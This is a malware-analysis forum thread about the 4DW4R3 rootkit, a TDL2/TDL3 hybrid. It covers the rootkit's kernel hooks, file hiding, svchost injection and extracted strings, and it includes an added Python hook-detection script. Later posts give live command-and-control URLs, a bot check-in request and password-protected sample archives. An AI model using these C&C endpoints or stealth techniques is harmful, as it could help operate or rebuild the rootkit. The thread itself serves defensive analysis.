A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #145  by EP_X0FF
 Mon Mar 15, 2010 2:10 am
Hybrid rootkit combining TDL2 and TDL3 stealth functionality.
First seen ITW at the beginning of 2010.

The rootkit is called 4DW4R3 because of strings found inside the binary during RE.

The dropper uses the TDL3 spoolsv driver-loading technique; if that fails, it calls NtLoadDriver directly.

The rootkit driver is hidden from the PsLoadedModules list and performs SSDT hooking and IofCompleteRequest hooking to prevent removal of its files.

The payload DLL and driver file are hidden under the following names (the trailing part may be random):
C:\WINDOWS\system32\4DW4R3oQegcHRgnX.dll
C:\WINDOWS\system32\drivers\4DW4R3NtISsUJPOt.sys
!-->[Hidden Driver] 0xB2689000 C:\WINDOWS\system32\drivers\4DW4R3.sys, size: 61440 bytes
ntkrnlpa.exe-->IofCompleteRequest, Type: Inline - RelativeJump 0x804EF226-->B268ABD7 [4DW4R3.sys]
ntkrnlpa.exe-->NtCallbackReturn, Type: Inline - RelativeJump 0x8050188C-->B268AEB9 [4DW4R3.sys]
ntkrnlpa.exe-->NtEnumerateKey, Type: Inline - RelativeJump 0x80623FC6-->B268A97D [4DW4R3.sys]
ntkrnlpa.exe-->NtSaveKey, Type: Inline - RelativeJump 0x8062523A-->B268A973 [4DW4R3.sys]
ntkrnlpa.exe-->NtSaveKeyEx, Type: Inline - RelativeJump 0x80625320-->B268A978 [4DW4R3.sys]
Hooks are set on restoration.

The NtEnumerateKey, NtSaveKey and NtSaveKeyEx hooks are used to counteract detection via registry scanning.
The NtSaveKey hook bypasses RootkitRevealer.

The IofCompleteRequest hook is responsible for hiding rootkit data. It hides all files matching the mask 4DW4R3 (just as in TDL2, where a similar technique was used).

NtCallbackReturn is used as the communication method between the user-mode payload and the kernel-mode rootkit (like NtFlushInstructionCache in TDL2).

Unpacked driver readable strings:
.333 LoadLibraryExA System kernel32.dll s v c h o s t . e x e \ r e g i s t r y \ m a c h i n e \ s y s t e m \ c u r r e n t c o n t r o l s e t \ s e r v i c e s \ 4 D W 4 R 3 \ m o d u l e s %s%s %s;%s \ r e g i s t r y \ m a c h i n e \ s y s t e m \ c u r r e n t c o n t r o l s e t \ s e r v i c e s \ 4 D W 4 R 3 \ i n j e c t o r \\?\globalroot\systemroot\system32\4DW4R3c.dll svchost.exe * * \ K E R N E L 3 2 . D L L i m a g e p a t h % S group file system imagepath type \ r e g i s t r y \ m a c h i n e \ s y s t e m \ c u r r e n t c o n t r o l s e t \ s e r v i c e s \ 4 D W 4 R 3 start \\?\globalroot\systemroot\system32\drivers\4DW4R3.sys 4 D W 4 R 3 \ r e g i s t r y \ m a c h i n e \ s y s t e m \ c u r r e n t c o n t r o l s e t \ s e r v i c e s \ 4 D W 4 R 3 \ c o n n e c t i o n s %08x \ f i l e s y s t e m \ f l t m g r NtCallbackReturn NtSaveKeyEx NtSaveKey NtEnumerateKey IofCompleteRequest \ d r i v e r \ t c p i p \ f i l e s y s t e m \ f a s t f a t \ f i l e s y s t e m \ n t f s KeServiceDescriptorTable \\?\globalroot %.*S \ s y s t e m r o o t \ s y s t e m 3 2 \ % s %S%s%s n t d l l . d l l \ B a s e N a m e d O b j e c t s \ { 1 3 6 4 B 1 7 4 - D E C F - 4 5 8 a - A D E 3 - D D 2 9 4 9 6 1 C B D 2 } \ r e g i s t r y \ m a c h i n e \ s y s t e m \ c u r r e n t c o n t r o l s e t \ e n u m \ r o o t \ l e g a c y _ 4 D W 4 R 3 \ r e g i s t r y \ m a c h i n e \ s y s t e m \ c u r r e n t c o n t r o l s e t \ e n u m \ r o o t \ l e g a c y _ 4 D W 4 R 3 \ 0 0 0 0 \ r e g i s t r y \ m a c h i n e \ s y s t e m \ c u r r e n t c o n t r o l s e t \ e n u m \ r o o t \ l e g a c y _ 4 D W 4 R 3 \ 0 0 0 0 \ c o n t r o l
The payload DLL is injected into the svchost.exe process (like the original TDL3) and removed from the loader list.

DLL internals:
4DW4R3SK 4DW4R3 %08x cmddelay \ r e g i s t r y \ m a c h i n e \ s o f t w a r e \ 4 D W 4 R 3 c redirurl &p= ?p= .yimg.com .yahoo. search search.yahoo. alltheweb.com .icq. search.icq. cdn.atwola. /search? search.aol. /web ask.com web/results altavista.com bing.com ?q= &q= /ie /custom /search google. & http/1.
host: http:// / ://
referer: <html><head><title>%s</title><meta http-equiv="refresh" content="0;url=%s?keyword=%s&uid=%s&seid=%d&original_uri=%s"></head></html> HTTP/1.1 200 OK
Cache-Control: no-cache,no-store,must-revalidate
Content-Type: text/html
Content-Length: %d
Connection: close
%s HTTP/1.1 302 Found
Location: %s
Content-Length: 0
Connection: close
urlmon.dll ObtainUserAgentString Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Unknown WinVista Win2003 WinXP Win2K WinNT4 WinNT3 WinME Win98 Win95 %ssp%d %s_%08X GET % S %d %x %s?id=%s&uid=%s&os=%s %[^.].%[^(](%[^)]) \\?\globalroot\systemroot\system32\4DW4R3sv.dat %.*S %s%s%x *browser* *avant* *netscape* *flock* *safari* *chrome* *opera* *mozilla* *firefox* *explore* .333 %[^;];%[^;];%[^;]; ws2_32.dll recv send WSARecv WSASend \ { 5 D B F 4 E 2 5 - 6 2 4 6 - 4 d c 2 - 8 2 B 0 - 4 A F 6 7 8 3 D 5 B B 5 } svchost.exe
The rootkit sets an ImageLoad notify callback to perform DLL injection into newly started processes.

This malware is also being updated, so fresher samples can be found on the internet.

VirusTotal
http://www.virustotal.com/analisis/92c5 ... 1268618947

MD5
f039715e00a4279cfe9c6c224a70c09e

SHA1
0a4f6a6798187f30c60f580d9cfe5b482e824c49
Attachments
pass: malware
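The hook lines quoted above ("Inline - RelativeJump 0x804EF226-->B268ABD7 [4DW4R3.sys]") are what a kernel scanner produces when it reads the first bytes of an exported routine, finds an E9 rel32 jump, computes the destination as address + 5 + rel32, and attributes that destination to the module whose load range contains it (here the hidden 4DW4R3.sys at 0xB2689000, 61440 bytes). The following Python is an added example, not code from the original post or from any scanner named in it; it parses the post's report lines and reproduces the same check over a constructed, hypothetical memory image (the sample addresses, the `UnhookedExport` name and the `read_memory` callback are assumptions, not captures from a real system).

```python
import re
import struct

# From the post: the hidden driver's load address and size, used to
# attribute jump targets to a module the way the scanner output does.
HIDDEN_MODULES = {"4DW4R3.sys": (0xB2689000, 0xB2689000 + 61440)}

# Report lines in the format quoted in the post (page text, not constructed).
SAMPLE_REPORT = """
ntkrnlpa.exe-->IofCompleteRequest, Type: Inline - RelativeJump 0x804EF226-->B268ABD7 [4DW4R3.sys]
ntkrnlpa.exe-->NtCallbackReturn, Type: Inline - RelativeJump 0x8050188C-->B268AEB9 [4DW4R3.sys]
ntkrnlpa.exe-->NtEnumerateKey, Type: Inline - RelativeJump 0x80623FC6-->B268A97D [4DW4R3.sys]
ntkrnlpa.exe-->NtSaveKey, Type: Inline - RelativeJump 0x8062523A-->B268A973 [4DW4R3.sys]
ntkrnlpa.exe-->NtSaveKeyEx, Type: Inline - RelativeJump 0x80625320-->B268A978 [4DW4R3.sys]
"""

HOOK_LINE = re.compile(
    r"^(?P<image>.+?)-->(?P<func>\w+), Type: Inline - RelativeJump "
    r"0x(?P<addr>[0-9A-Fa-f]+)-->(?P<target>[0-9A-Fa-f]+) \[(?P<module>[^\]]+)\]$"
)


def parse_hook_report(text):
    """Parse scanner report lines into dicts with integer addresses."""
    hooks = []
    for line in text.splitlines():
        m = HOOK_LINE.match(line.strip())
        if m:
            hooks.append({
                "image": m["image"],
                "func": m["func"],
                "addr": int(m["addr"], 16),
                "target": int(m["target"], 16),
                "module": m["module"],
            })
    return hooks


def decode_rel_jmp(addr, prologue):
    """Return the destination of an E9 rel32 jump located at addr, or None
    when the bytes are not such a jump. x86 computes the destination
    relative to the end of the 5-byte instruction: addr + 5 + rel32."""
    if len(prologue) < 5 or prologue[0] != 0xE9:
        return None
    rel32 = struct.unpack_from("<i", prologue, 1)[0]
    return (addr + 5 + rel32) & 0xFFFFFFFF


def attribute_target(target, modules):
    """Name the module whose [base, end) range contains target, else None."""
    for name, (base, end) in modules.items():
        if base <= target < end:
            return name
    return None


def scan_exports(image, exports, read_memory, modules):
    """Check each export's first 5 bytes for an inline relative jump and
    return report lines in the post's format. read_memory(addr) is an
    assumed callback returning at least 5 bytes at addr."""
    findings = []
    for func, addr in exports.items():
        target = decode_rel_jmp(addr, read_memory(addr))
        if target is None:
            continue  # no E9 at the entry: not an inline jump hook
        module = attribute_target(target, modules) or "unknown"
        findings.append(
            f"{image}-->{func}, Type: Inline - RelativeJump "
            f"0x{addr:08X}-->{target:08X} [{module}]"
        )
    return findings


# --- constructed sample memory image (hypothetical, for demonstration) ---
STD_PROLOGUE = b"\x8B\xFF\x55\x8B\xEC"  # mov edi,edi; push ebp; mov ebp,esp


def _jmp_bytes(addr, target):
    """Encode the 5-byte E9 rel32 stub that a scanner would read at addr if
    the routine had been redirected to target (wrapped to a signed rel32)."""
    rel32 = (target - (addr + 5) + 2**31) % 2**32 - 2**31
    return b"\xE9" + struct.pack("<i", rel32)


SAMPLE_EXPORTS = {
    "IofCompleteRequest": 0x804EF226,  # address from the post's report
    "NtCallbackReturn": 0x8050188C,    # address from the post's report
    "UnhookedExport": 0x80570000,      # constructed, unhooked routine
}
SAMPLE_MEMORY = {
    0x804EF226: _jmp_bytes(0x804EF226, 0xB268ABD7),
    0x8050188C: _jmp_bytes(0x8050188C, 0xB268AEB9),
    0x80570000: STD_PROLOGUE,
}


def demo():
    """Run the scan over the constructed image; expected to flag only the
    two routines whose entry jumps into the hidden driver's range."""
    return scan_exports("ntkrnlpa.exe", SAMPLE_EXPORTS,
                        SAMPLE_MEMORY.__getitem__, HIDDEN_MODULES)


if __name__ == "__main__":
    for hook in parse_hook_report(SAMPLE_REPORT):
        print(hook["func"], hex(hook["target"]),
              attribute_target(hook["target"], HIDDEN_MODULES))
    print("\n".join(demo()))
```

The attribution step is what turns a raw jump destination into the `[4DW4R3.sys]` tag even though the driver is absent from PsLoadedModules: the scanner only needs the load range it obtained by other means (here hard-coded from the post's "Hidden Driver" line), so a module hidden from the loader list is still identifiable once any hook points into it.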
 #162  by gjf
 Mon Mar 15, 2010 10:52 am
"TDL2 Clone" - does it mean the standard detection/removal tools for TDSS can be used? Actually, TDL2 could be easily detected and removed using Gmer (and even AVZ, but with Gmer information, of course).
 #169  by EP_X0FF
 Mon Mar 15, 2010 1:16 pm
gjf wrote:"TDL2 Clone" - does it mean the standard detection/removal tools for TDSS can be used?
Yes, sure. All of them should be able to detect and remove it.
 #336  by Cr4sh
 Fri Mar 19, 2010 1:55 pm
The attached sample has been configured for the following C&Cs (from decrypted DLL data):
http://triplexfeed.com/search.php;25;15;
http://triplexfund.com/allbots_private_stat/cmd.php
But the host is dead:
localhost ~ # nmap -sV -O -P0 95.143.192.25

Starting Nmap 5.00 ( http://nmap.org ) at 2010-03-20 00:43 MSK
All 1000 scanned ports on 95.143.192.25 are filtered
Too many fingerprints match this host to give specific OS details

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 219.81 seconds
Maybe somebody has a more recent sample?
 #343  by EP_X0FF
 Fri Mar 19, 2010 5:16 pm
Hi Cr4sh,

I additionally have two samples.

First dated 24 February 2010 (VirusTotal)

MD5
98864e5ae12ea7edb3fb42fd61803bfa

Second dated 7 March 2010 (VirusTotal)

MD5
dd28d91a89145d80c415e442271df813

Both are attached here in an archive, pass: malware

HTH
Attachments
pass: malware
 #349  by Cr4sh
 Fri Mar 19, 2010 6:17 pm
Thanks.
Probably they have some problems with the server. triplexfund.com is now available (at 122.70.149.12). The valid C&C URL (from the latest builds) is:
GET /allbots_private_stat/cmd.php?id=XP_8823DEE4&uid=32&os=WinXPsp3 HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: triplexfund.com
Pragma: no-cache